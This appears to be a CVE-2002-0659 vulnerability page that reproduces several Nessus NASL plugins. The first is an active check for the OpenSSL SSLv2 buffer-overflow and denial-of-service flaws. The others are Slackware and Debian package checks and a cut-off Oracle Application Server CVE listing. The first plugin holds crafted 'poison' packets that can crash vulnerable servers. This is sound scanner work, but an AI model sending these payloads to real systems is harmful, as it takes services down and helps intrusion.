Vulnerabilities > CVE-2002-0659 - Denial Of Service vulnerability in OpenSSL ASN.1 Parsing Error

#TRUSTED 0c735fb6d18b92e7dc463c39c93d50b398065651cd7c0ed318a5d1d34834031824c3a22050ca6e31fbcc01030a07f38ce398a73c4434f40cb325e945345c784571586ec7573bbad8187a83596ed8318eaf6fbe29658c28bbe29b37b708585e162f200a9dc8e3bb88b92c4ed92cc2ba1f3a809c28160e7ce5f02d05b54fe911864cb36397a0a6c7db4ce53e6c12d096326a0b0727e3f007c5b916a75245b03a0c89887f2a18c581d7a4c49d88672878280dc6da584f38fcfb32d39750cece204f7a4cdd4d8e5a18bc563660825d4db1ee613352088fdc75b46c9dade84128772db6b409a5b09ed95b3156e4175c6d66dea8e2f1aa3db4e4c723621cec8449ba4b4869188c9e4687fd548a2c19c20bfc66382490a21d71e882380baf0c6c9b33b4382c5ce2683444bf2988676a4abe4e2865c6782ef082ebcf0ad497a1cc0c9cb35128ba8c71af2eb86b143e720d1e461e6556cd4385e503f30cea015f9d8bbaf86087917e85775f1a89b32e0323aab41988798789ba048a32d1fda6103fee96f4c882cd51ed5020991e252eee40c145fcce7c754df18a8cac345a4b4d20a503ac645e70005c5f48de74f07b68ac07b51bb6d8c05de995db8b389dce0ca9e57291b3e43a0218c94628387c12c67ba32cf4beff50a54372c43eab3040569ff783cba5fbb9ed40b3996e373be2aeec209568a4832fd3fe0d490a0857f942f69a71b9
#
# (C) Tenable Network Security, Inc.
#

# Thanks to Solar Eclipse <[email protected]>, who did most
# of the work.
#
# Will incidentally cover CVE-2001-1141 and CVE-2000-0535
#


include("compat.inc");

if (description)
{
 script_id(11060);
 script_version("1.61");
 script_set_attribute(attribute:"plugin_modification_date", value:"2020/06/12");

 script_cve_id(
  "CVE-2000-0535",
  "CVE-2001-1141",
  "CVE-2002-0655",
  "CVE-2002-0656",
  "CVE-2002-0657",
  "CVE-2002-0659"
 );
 script_bugtraq_id(1340, 3004, 5361, 5362, 5363, 5364, 5366);
 script_xref(name:"SuSE", value:"SUSE-SA:2002:033");

 script_name(english:"OpenSSL < 0.9.6e / 0.9.7b3 Multiple Remote Vulnerabilities");
 script_summary(english:"Checks for the behavior of OpenSSL");

 script_set_attribute(attribute:"synopsis", value:
"The remote service uses a library that is affected by a buffer
overflow vulnerability.");
 script_set_attribute(attribute:"description", value:
"The remote service seems to be using a version of OpenSSL that is
older than 0.9.6e or 0.9.7-beta3.

Such versions are affected by a buffer overflow that may allow an
attacker to execute arbitrary commands on the remote host with the
privileges of the application itself.");
 script_set_attribute(attribute:"solution", value:"Upgrade to OpenSSL version 0.9.6e / 0.9.7beta3 or later.");
 script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C");
 script_set_cvss_temporal_vector("CVSS2#E:F/RL:OF/RC:C");
 script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
 script_set_attribute(attribute:"exploit_available", value:"true");
 script_set_attribute(attribute:"exploit_framework_core", value:"true");
 script_set_attribute(attribute:"exploit_framework_canvas", value:"true");
 script_set_attribute(attribute:"canvas_package", value:'CANVAS');

 script_set_attribute(attribute:"plugin_publication_date", value:"2002/08/05");
 script_set_attribute(attribute:"patch_publication_date", value:"2002/07/30");
 script_set_attribute(attribute:"vuln_publication_date", value:"2001/07/10");
 script_set_attribute(attribute:"plugin_type", value:"remote");
 script_set_attribute(attribute:"cpe", value:"cpe:/a:openssl:openssl");
 script_end_attributes();

 script_category(ACT_MIXED_ATTACK);
 script_copyright(english:"This script is Copyright (C) 2002-2020 Solar Eclipse / Renaud Deraison");
 script_family(english:"Gain a shell remotely");
 script_dependencies("ssl_supported_versions.nasl");
 script_require_keys("SSL/Supported");

 exit(0);
}

include("byte_func.inc");
include("ftp_func.inc");
include("global_settings.inc");
include("kerberos_func.inc");
include("ldap_func.inc");
include("misc_func.inc");
include("nntp_func.inc");
include("smtp_func.inc");
include("ssl_funcs.inc");
include("telnet2_func.inc");

if ( safe_checks() && report_paranoia < 2 ) exit(0);

#------------------------------ Consts ----------------------#
client_hello = raw_string(
0x80, 0x31, 0x01, 0x00,
0x02,  0x00, 0x18,0x00,
0x00,  0x00, 0x10,0x07,
0x00, 0xC0, 0x05, 0x00,
0x80, 0x03, 0x00, 0x80,
0x01, 0x00, 0x80, 0x08,
0x00, 0x80, 0x06, 0x00,
0x40, 0x04, 0x00, 0x80,
0x02, 0x00, 0x80, 0xE4,
0xBD, 0x00, 0x00, 0xA4,
0x41, 0xB6, 0x74, 0x71,
0x2B, 0x27, 0x95, 0x44,
0xC0, 0x3D, 0xC0);


poison = raw_string(
0x80,0x5a,0x2,0x7,
0x0,0xc0,0x0,0x0,
0x0,0x40,0x0,0x10,
0x19,0x53,0xf,0x55,
0x5e,0xaa,0x68,0x71,
0x3,0x27,0x4,0x5a,
0x1f,0x5,0xea,0x33,
0x29,0x5b,0xb9,0x3f,
0x7d,0x28,0xe6,0x4c,
0xd4,0xb3,0x8e,0x36,
0x44,0xb5,0x86,0x6c,
0x6c,0x6,0xc1,0x5c,
0x45,0x73,0xb8,0x11,
0x55,0x23,0x3e,0x2a,
0x52,0xe0,0x52,0x30,
0xda,0xf8,0xee,0x15,
0x79,0xe1,0x3c,0x68,
0x36,0xd1,0x14,0x26,
0xae,0xd4,0x30,0x2,
0x0,0x0,0x0,0x0,
0x4,0x0,0x0,0x0,
0x41,0x41,0x41,0x41,
0x41,0x41,0x41,0x41);


big_poison = raw_string(
0x81, 0xca, 0x2, 0x7,
0x0, 0xc0, 0x0, 0x0,
0x0, 0x40, 0x1, 0x80,
0xa4, 0x20, 0xb4, 0x44,
0xd, 0xe, 0x7c, 0x5,
0xc2, 0x21, 0x28, 0x4d,
0xd3, 0xab, 0x6b, 0x72,
0x10, 0xa3, 0x64, 0x7e,
0x9, 0x7e, 0xe8, 0x28,
0xe, 0x98, 0x5a, 0x5,
0x2f, 0x32, 0xbb, 0xa,
0x3c, 0xe0, 0x58, 0x5a,
0xc5, 0xf1, 0x91, 0x36,
0x1a, 0x27, 0x2c, 0x37,
0x4b, 0xc2, 0xd2, 0x49,
0x28, 0xc4, 0xf1, 0x76,
0x41, 0xe5, 0xa4, 0x2d,
0xe6, 0x9a, 0x55, 0x7e,
0x27, 0x38, 0x89, 0x13,
0x0, 0x0, 0x0, 0x0,
0x4, 0x0, 0x0, 0x0,
0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41);



#-------- The code. We need the check what happens on each port ------------#

moderate_report =
"Note that since safe checks are enabled, this check might be fooled by
non-openssl implementations and produce a false positive.
In doubt, re-execute the scan without the safe checks";

get_kb_item_or_exit("SSL/Supported");

port = get_ssl_ports(fork:TRUE);
if (isnull(port))
  exit(1, "The host does not appear to have any SSL-based services.");

# Find out if the port is open.
if (!get_port_state(port))
  exit(0, "Port " + port + " is not open.");

# Connect to the port, issuing the StartTLS command if necessary.
soc = open_sock_ssl(port);
if (!soc)
  exit(1, "open_sock_ssl() returned NULL for port " + port + ".");

send(socket:soc, data:client_hello);
buf = recv(socket:soc, length:8192);
if(!strlen(buf))exit(0);
send(socket:soc, data:poison);
buf = recv(socket:soc, length:10);
close(soc);
if(safe_checks())
{
if(strlen(buf) > 5)security_hole(port:port, extra: moderate_report);
}
else
{
 if(strlen(buf) > 5)
 {
  # Connect to the port, issuing the StartTLS command if necessary.
  soc = open_sock_ssl(port);
  if (!soc)
    exit(1, "open_sock_ssl() returned NULL for port " + port + ".");

  send(socket:soc, data:client_hello);
  buf = recv(socket:soc, length:8192);
  if(!strlen(buf))exit(0);
  n = send(socket:soc, data:big_poison);
  if ( n != strlen(big_poison) ) exit(0);

  buf = recv(socket:soc, length:4096);
  close(soc);
  if(strlen(buf) == 0)security_hole(port);
 }
}

#%NASL_MIN_LEVEL 999999

# @DEPRECATED@
#
# This script has been deprecated and is no longer used 
# after a revamping of the Slackware generator.
#
# Disabled on 2011/05/27. 
#
# This script was automatically generated from a
# Slackware Security Advisory
# It is released under the Nessus Script Licence.
# Slackware Security Advisories are copyright 1999-2004 Slackware Linux, Inc.
# SSA2nasl Convertor is copyright 2004 Tenable Network Security, Inc.
# See http://www.slackware.com/about/ or http://www.slackware.com/security/
# Slackware(R) is a registered trademark of Slackware Linux, Inc.

if (! defined_func("bn_random")) exit(0);


include("compat.inc");

if (description) {
script_id(18706);
script_version("1.12");
script_cvs_date("Date: 2018/07/20  0:18:52");
script_category(ACT_GATHER_INFO);
script_family(english: "Slackware Local Security Checks");
script_dependencies("ssh_get_info.nasl");
script_copyright("This script is Copyright (C) 2005-2018 Tenable Network Security, Inc.");
script_require_keys("Host/Slackware/release", "Host/Slackware/packages");
 script_set_attribute(attribute:"synopsis", value:
"The remote host is missing a security update." );
 script_set_attribute(attribute:"description", value:
"Several security updates are now available for Slackware 8.1, including
updated packages for Apache, glibc, mod_ssl, openssh, openssl, and php." );
 script_set_attribute(attribute:"solution", value:
"Update the packages that are referenced in the security advisory." );
 script_set_cvss_base_vector("CVSS2#AV:L/AC:H/Au:N/C:C/I:C/A:C");
 script_set_attribute(attribute:"plugin_publication_date", value: "2005/07/13");
script_end_attributes();


script_summary("SSA Security updates for Slackware 8.1");
name["english"] = "SSA-18706 Security updates for Slackware 8.1";
script_name(english:name["english"]);script_cve_id("CVE-2002-0653","CVE-2002-0658","CVE-2002-0659");
exit(0);
}

exit(0);

include('slackware.inc');
include('global_settings.inc');

desc="";
if (slackware_check(osver: "8.1", pkgname: "apache", pkgver: "1.3.26", pkgnum:  "2", pkgarch: "i386")) {
w++;
if (report_verbosity > 0) desc = strcat(desc, '
The package apache is vulnerable in Slackware 8.1
Upgrade to apache-1.3.26-i386-2 or newer.
');
}
if (slackware_check(osver: "8.1", pkgname: "glibc", pkgver: "2.2.5", pkgnum:  "3", pkgarch: "i386")) {
w++;
if (report_verbosity > 0) desc = strcat(desc, '
The package glibc is vulnerable in Slackware 8.1
Upgrade to glibc-2.2.5-i386-3 or newer.
');
}
if (slackware_check(osver: "8.1", pkgname: "glibc-solibs", pkgver: "2.2.5", pkgnum:  "3", pkgarch: "i386")) {
w++;
if (report_verbosity > 0) desc = strcat(desc, '
The package glibc-solibs is vulnerable in Slackware 8.1
Upgrade to glibc-solibs-2.2.5-i386-3 or newer.
');
}
if (slackware_check(osver: "8.1", pkgname: "mod_ssl", pkgver: "2.8.10_1.3.26", pkgnum:  "1", pkgarch: "i386")) {
w++;
if (report_verbosity > 0) desc = strcat(desc, '
The package mod_ssl is vulnerable in Slackware 8.1
Upgrade to mod_ssl-2.8.10_1.3.26-i386-1 or newer.
');
}
if (slackware_check(osver: "8.1", pkgname: "openssh", pkgver: "3.4p1", pkgnum:  "2", pkgarch: "i386")) {
w++;
if (report_verbosity > 0) desc = strcat(desc, '
The package openssh is vulnerable in Slackware 8.1
Upgrade to openssh-3.4p1-i386-2 or newer.
');
}
if (slackware_check(osver: "8.1", pkgname: "openssl", pkgver: "0.9.6e", pkgnum:  "1", pkgarch: "i386")) {
w++;
if (report_verbosity > 0) desc = strcat(desc, '
The package openssl is vulnerable in Slackware 8.1
Upgrade to openssl-0.9.6e-i386-1 or newer.
');
}
if (slackware_check(osver: "8.1", pkgname: "openssl-solibs", pkgver: "0.9.6e", pkgnum:  "1", pkgarch: "i386")) {
w++;
if (report_verbosity > 0) desc = strcat(desc, '
The package openssl-solibs is vulnerable in Slackware 8.1
Upgrade to openssl-solibs-0.9.6e-i386-1 or newer.
');
}
if (slackware_check(osver: "8.1", pkgname: "php", pkgver: "4.2.2", pkgnum:  "1", pkgarch: "i386")) {
w++;
if (report_verbosity > 0) desc = strcat(desc, '
The package php is vulnerable in Slackware 8.1
Upgrade to php-4.2.2-i386-1 or newer.
');
}

if (w) { security_warning(port: 0, extra: desc); }

#%NASL_MIN_LEVEL 80502

#
# (C) Tenable Network Security, Inc.
#
# The descriptive text and package checks in this plugin were  
# extracted from Debian Security Advisory DSA-136. The text 
# itself is copyright (C) Software in the Public Interest, Inc.
#

include("compat.inc");

if (description)
{
  script_id(14973);
  script_version("1.28");
  script_cvs_date("Date: 2019/08/02 13:32:16");

  script_cve_id("CVE-2002-0655", "CVE-2002-0656", "CVE-2002-0657", "CVE-2002-0659", "CVE-2005-1730");
  script_bugtraq_id(5353, 5361, 5362, 5363, 5364, 5366);
  script_xref(name:"DSA", value:"136");

  script_name(english:"Debian DSA-136-1 : openssl - multiple remote exploits");
  script_summary(english:"Checks dpkg output for the updated package");

  script_set_attribute(
    attribute:"synopsis", 
    value:"The remote Debian host is missing a security-related update."
  );
  script_set_attribute(
    attribute:"description", 
    value:
"The OpenSSL development team has announced that a security audit by
A.L. Digital Ltd and The Bunker, under the DARPA CHATS program, has
revealed remotely exploitable buffer overflow conditions in the
OpenSSL code. Additionally, the ASN1 parser in OpenSSL has a potential
DoS attack independently discovered by Adi Stav and James Yonan.

CAN-2002-0655 references overflows in buffers used to hold ASCII
representations of integers on 64 bit platforms. CAN-2002-0656
references buffer overflows in the SSL2 server implementation (by
sending an invalid key to the server) and the SSL3 client
implementation (by sending a large session id to the client). The SSL2
issue was also noticed by Neohapsis, who have privately demonstrated
exploit code for this issue. CAN-2002-0659 references the ASN1 parser
DoS issue.

These vulnerabilities have been addressed for Debian 3.0 (woody) in
openssl094_0.9.4-6.woody.2, openssl095_0.9.5a-6.woody.1 and
openssl_0.9.6c-2.woody.1.

These vulnerabilities are also present in Debian 2.2 (potato). Fixed
packages are available in openssl094_0.9.4-6.potato.2 and
openssl_0.9.6c-0.potato.4.

A worm is actively exploiting this issue on internet-attached hosts;
we recommend you upgrade your OpenSSL as soon as possible. Note that
you must restart any daemons using SSL. (E.g., ssh or ssl-enabled
apache.) If you are uncertain which programs are using SSL you may
choose to reboot to ensure that all running daemons are using the new
libraries."
  );
  script_set_attribute(
    attribute:"see_also",
    value:"http://www.debian.org/security/2002/dsa-136"
  );
  script_set_attribute(
    attribute:"solution", 
    value:"Upgrade the affected openssl package."
  );
  script_set_cvss_base_vector("CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C");
  script_set_cvss_temporal_vector("CVSS2#E:F/RL:OF/RC:C");
  script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
  script_set_attribute(attribute:"exploit_available", value:"true");
  script_set_attribute(attribute:"exploit_framework_core", value:"true");
  script_set_attribute(attribute:"exploit_framework_canvas", value:"true");
  script_set_attribute(attribute:"canvas_package", value:'CANVAS');

  script_set_attribute(attribute:"plugin_type", value:"local");
  script_set_attribute(attribute:"cpe", value:"p-cpe:/a:debian:debian_linux:openssl");
  script_set_attribute(attribute:"cpe", value:"cpe:/o:debian:debian_linux:2.2");
  script_set_attribute(attribute:"cpe", value:"cpe:/o:debian:debian_linux:3.0");

  script_set_attribute(attribute:"patch_publication_date", value:"2002/07/30");
  script_set_attribute(attribute:"plugin_publication_date", value:"2004/09/29");
  script_set_attribute(attribute:"vuln_publication_date", value:"2002/07/30");
  script_end_attributes();

  script_category(ACT_GATHER_INFO);
  script_copyright(english:"This script is Copyright (C) 2004-2019 Tenable Network Security, Inc.");
  script_family(english:"Debian Local Security Checks");

  script_dependencies("ssh_get_info.nasl");
  script_require_keys("Host/local_checks_enabled", "Host/Debian/release", "Host/Debian/dpkg-l");

  exit(0);
}


include("audit.inc");
include("debian_package.inc");


if (!get_kb_item("Host/local_checks_enabled")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);
if (!get_kb_item("Host/Debian/release")) audit(AUDIT_OS_NOT, "Debian");
if (!get_kb_item("Host/Debian/dpkg-l")) audit(AUDIT_PACKAGE_LIST_MISSING);


flag = 0;
if (deb_check(release:"2.2", prefix:"libssl-dev", reference:"0.9.6c-0.potato.4")) flag++;
if (deb_check(release:"2.2", prefix:"libssl0.9.6", reference:"0.9.6c-0.potato.4")) flag++;
if (deb_check(release:"2.2", prefix:"libssl09", reference:"0.9.4-6.potato.2")) flag++;
if (deb_check(release:"2.2", prefix:"openssl", reference:"0.9.6c-0.potato.4")) flag++;
if (deb_check(release:"2.2", prefix:"ssleay", reference:"0.9.6c-0.potato.3")) flag++;
if (deb_check(release:"3.0", prefix:"libssl-dev", reference:"0.9.6c-2.woody.1")) flag++;
if (deb_check(release:"3.0", prefix:"libssl0.9.6", reference:"0.9.6c-2.woody.1")) flag++;
if (deb_check(release:"3.0", prefix:"libssl09", reference:"0.9.4-6.woody.1")) flag++;
if (deb_check(release:"3.0", prefix:"libssl095a", reference:"0.9.5a-6.woody.1")) flag++;
if (deb_check(release:"3.0", prefix:"openssl", reference:"0.9.6c-2.woody.1")) flag++;

if (flag)
{
  if (report_verbosity > 0) security_hole(port:0, extra:deb_report_get());
  else security_hole(0);
  exit(0);
}
else audit(AUDIT_HOST_NOT, "affected");

#
# (C) Tenable Network Security, Inc.
#

include("compat.inc");

if (description)
{
  script_id(57619);
  script_version("1.23");
  script_cvs_date("Date: 2019/04/05 15:04:42");

  script_cve_id(
    "CVE-2000-0169",
    "CVE-2000-1235",
    "CVE-2000-1236",
    "CVE-2001-0326",
    "CVE-2001-0419",
    "CVE-2001-0591",
    "CVE-2001-1216",
    "CVE-2001-1217",
    "CVE-2001-1371",
    "CVE-2001-1372",
    "CVE-2002-0386",
    "CVE-2002-0559",
    "CVE-2002-0560",
    "CVE-2002-0561",
    "CVE-2002-0562",
    "CVE-2002-0563",
    "CVE-2002-0564",
    "CVE-2002-0565",
    "CVE-2002-0566",
    "CVE-2002-0568",
    "CVE-2002-0569",
    "CVE-2002-0655",
    "CVE-2002-0656",
    "CVE-2002-0659",
    "CVE-2002-0840",
    "CVE-2002-0842",
    "CVE-2002-0843",
    "CVE-2002-0947",
    "CVE-2002-1089",
    "CVE-2002-1630",
    "CVE-2002-1631",
    "CVE-2002-1632",
    "CVE-2002-1635",
    "CVE-2002-1636",
    "CVE-2002-1637",
    "CVE-2002-1858",
    "CVE-2002-2153",
    "CVE-2002-2345",
    "CVE-2002-2347",
    "CVE-2004-1362",
    "CVE-2004-1363",
    "CVE-2004-1364",
    "CVE-2004-1365",
    "CVE-2004-1366",
    "CVE-2004-1367",
    "CVE-2004-1368",
    "CVE-2004-1369",
    "CVE-2004-1370",
    "CVE-2004-1371",
    "CVE-2004-1707",
    "CVE-2004-1774",
    "CVE-2004-1877",
    "CVE-2004-2134",
    "CVE-2004-2244",
    "CVE-2005-1383",
    "CVE-2005-1495",
    "CVE-2005-1496",
    "CVE-2005-2093",
    "CVE-2005-3204",
    "CVE-2005-3445",
    "CVE-2005-3446",
    "CVE-2005-3447",
    "CVE-2005-3448",
    "CVE-2005-3449",
    "CVE-2005-3450",
    "CVE-2005-3451",
    "CVE-2005-3452",
    "CVE-2005-3453",
    "CVE-2006-0273",
    "CVE-2006-0274",
    "CVE-2006-0275",
    "CVE-2006-0282",
    "CVE-2006-0283",
    "CVE-2006-0284",
    "CVE-2006-0285",
    "CVE-2006-0286",
    "CVE-2006-0287",
    "CVE-2006-0288",
    "CVE-2006-0289",
    "CVE-2006-0290",
    "CVE-2006-0291",
    "CVE-2006-0435",
    "CVE-2006-0552",
    "CVE-2006-0586",
    "CVE-2006-1884",
    "CVE-2006-3706",
    "CVE-2006-3707",
    "CVE-2006-3708",
    "CVE-2006-3709",
    "CVE-2006-3710",
    "CVE-2006-3711",
    "CVE-2006-3712",
    "CVE-2006-3713",
    "CVE-2006-3714",
    "CVE-2006-5353",
    "CVE-2006-5354",
    "CVE-2006-5355",
    "CVE-2006-5356",
    "CVE-2006-5357",
    "CVE-2006-5358",
    "CVE-2006-5359",
    "CVE-2006-5360",
    "CVE-2006-5361",
    "CVE-2006-5362",
    "CVE-2006-5363",
    "CVE-2006-5364",
    "CVE-2006-5365",
    "CVE-2006-5366",
    "CVE-2007-0222",
    "CVE-2007-0275",
    "CVE-2007-0280",
    "CVE-2007-0281",
    "CVE-2007-0282",
    "CVE-2007-0283",
    "CVE-2007-0284",
    "CVE-2007-0285",
    "CVE-2007-0286",
    "CVE-2007-0287",
    "CVE-2007-0288",
    "CVE-2007-0289",
    "CVE-2007-1359",
    "CVE-2007-1609",
    "CVE-2007-2119",
    "CVE-2007-2120",
    "CVE-2007-2121",
    "CVE-2007-2122",
    "CVE-2007-2123",
    "CVE-2007-2124",
    "CVE-2007-2130",
    "CVE-2007-3553",
    "CVE-2007-3854",
    "CVE-2007-3859",
    "CVE-2007-3861",
    "CVE-2007-3862",
    "CVE-2007-3863",
    "CVE-2007-5516",
    "CVE-2007-5517",
    "CVE-2007-5518",
    "CVE-2007-5519",
    "CVE-2007-5520",
    "CVE-2007-5521",
    "CVE-2007-5522",
    "CVE-2007-5523",
    "CVE-2007-5524",
    "CVE-2007-5525",
    "CVE-2007-5526",
    "CVE-2007-5531",
    "CVE-2008-0340",
    "CVE-2008-0343",
    "CVE-2008-0344",
    "CVE-2008-0345",
    "CVE-2008-0346",
    "CVE-2008-0347",
    "CVE-2008-0348",
    "CVE-2008-0349",
    "CVE-2008-1812",
    "CVE-2008-1814",
    "CVE-2008-1823",
    "CVE-2008-1824",
    "CVE-2008-1825",
    "CVE-2008-2583",
    "CVE-2008-2588",
    "CVE-2008-2589",
    "CVE-2008-2593",
    "CVE-2008-2594",
    "CVE-2008-2595",
    "CVE-2008-2609",
    "CVE-2008-2612",
    "CVE-2008-2614",
    "CVE-2008-2619",
    "CVE-2008-2623",
    "CVE-2008-3975",
    "CVE-2008-3977",
    "CVE-2008-3986",
    "CVE-2008-3987",
    "CVE-2008-4014",
    "CVE-2008-4017",
    "CVE-2008-5438",
    "CVE-2008-7233",
    "CVE-2009-0217",
    "CVE-2009-0989",
    "CVE-2009-0990",
    "CVE-2009-0994",
    "CVE-2009-1008",
    "CVE-2009-1009",
    "CVE-2009-1010",
    "CVE-2009-1011",
    "CVE-2009-1017",
    "CVE-2009-1976",
    "CVE-2009-1990",
    "CVE-2009-1999",
    "CVE-2009-3407",
    "CVE-2009-3412",
    "CVE-2010-0066",
    "CVE-2010-0067",
    "CVE-2010-0070",
    "CVE-2011-0789",
    "CVE-2011-0795",
    "CVE-2011-0884",
    "CVE-2011-2237",
    "CVE-2011-2314",
    "CVE-2011-3523"
  );

  script_bugtraq_id(
    1053,
    2150,
    2286,
    2569,
    3341,
    3726,
    3727,
    4032,
    4034,
    4037,
    4289,
    4290,
    4292,
    4293,
    4294,
    4298,
    4844,
    4848,
    5119,
    5262,
    5362,
    5363,
    5364,
    5366,
    5452,
    5847,
    5887,
    5902,
    5995,
    5996,
    6556,
    6846,
    7395,
    9515,
    9703,
    10009,
    10829,
    10871,
    13145,
    13418,
    13509,
    15034,
    15134,
    16287,
    16294,
    16384,
    17590,
    19054,
    20588,
    22027,
    22083,
    22831,
    23102,
    23532,
    24697,
    27229,
    33177,
    34461,
    35671,
    35688,
    36746,
    36749,
    36753,
    50202,
    50209
  );

  script_name(english:"Oracle Application Server Multiple Vulnerabilities");
  script_summary(english:"Checks version in Server response header.");

 script_set_attribute(attribute:"synopsis", value:
"The remote web server may be affected by multiple vulnerabilities.");
 script_set_attribute(attribute:"description", value:
"The remote host is running Oracle Application Server. It was not possible
to determine its version, so the version of Oracle Application Server
installed on the remote host could potentially be affected by multiple
vulnerabilities :

  - CVE-2000-0169: Remote command execution in the web
    listener component.

  - CVE-2000-1235: Information disclosure in the port
    listener component and modplsql.

  - CVE-2000-1236: SQL injection in mod_sql.

  - CVE-2001-0326: Information disclosure in the Java
    Virtual Machine.

  - CVE-2001-0419: Buffer overflow in ndwfn4.so.

  - CVE-2001-0591: Directory traversal.

  - CVE-2001-1216: Buffer overflow in the PL/SQL Apache module.

  - CVE-2001-1217: Directory traversal vulnerability in the
    PL/SQL Apache module.

  - CVE-2001-1371: Improper access control in the SOAP
    service.

  - CVE-2001-1372: Information disclosure.

  - CVE-2002-0386: Denial of service through the
    administration module for Oracle Web Cache.

  - CVE-2002-0559: Buffer overflows in the PL/SQL module.

  - CVE-2002-0560: Information disclosure in the PL/SQL
    module.

  - CVE-2002-0561: Authentication bypass in the PL/SQL
    Gateway web administration interface.

  - CVE-2002-0562: Information disclosure through
    globals.jsa.

  - CVE-2002-0563: Improper access control on several
    services.

  - CVE-2002-0564: Authentication bypass in the PL/SQL
    module.

  - CVE-2002-0565: Information disclosure through JSP files
    in the _pages directory.

  - CVE-2002-0566: Denial of service in the PL/SQL module.

  - CVE-2002-0568: Improper access control on XSQLConfig.xml
    and soapConfig.xml.

  - CVE-2002-0569: Authentication bypass through
    XSQLServlet.

  - CVE-2002-0655: Denial of service in OpenSSL.

  - CVE-2002-0656: Buffer overflows in OpenSSL.

  - CVE-2002-0659: Denial of service in OpenSSL.

  - CVE-2002-0840: Cross-site scripting in the default error
    page of Apache.

  - CVE-2002-0842: Format string vulnerability in mod_dav.

  - CVE-2002-0843: Buffer overflows in ApacheBench.

  - CVE-2002-0947: Buffer overflow in rwcgi60.

  - CVE-2002-1089: Information disclosure in rwcgi60.

  - CVE-2002-1630: Improper access control on sendmail.jsp.

  - CVE-2002-1631: SQL injection in query.xsql.

  - CVE-2002-1632: Information disclosure through several
    JSP pages.

  - CVE-2002-1635: Information disclosure in Apache.

  - CVE-2002-1636: Cross-site scripting in the htp PL/SQL
    package.

  - CVE-2002-1637: Default credentials in multiple
    components.

  - CVE-2002-1858: Information disclosure through the
    WEB-INF directory.

  - CVE-2002-2153: Format string vulnerability in the
    administrative pages of the PL/SQL module.

  - CVE-2002-2345: Credential leakage in the web cache
    administrator interface.

  - CVE-2002-2347: Cross-site scripting in several JSP
    pages.

  - CVE-2004-1362: Authentication bypass in the PL/SQL
    module.

  - CVE-2004-1363: Buffer overflow in extproc.

  - CVE-2004-1364: Directory traversal in extproc.

  - CVE-2004-1365: Command execution in extproc.

  - CVE-2004-1366: Improper access control on
    emoms.properties.

  - CVE-2004-1367: Credential leakage in Database Server.

  - CVE-2004-1368: Arbitrary file execution in ISQL*Plus.

  - CVE-2004-1369: Denial of service in TNS Listener.

  - CVE-2004-1370: Multiple SQL injection vulnerabilities in
    PL/SQL.

  - CVE-2004-1371: Stack-based buffer overflow.

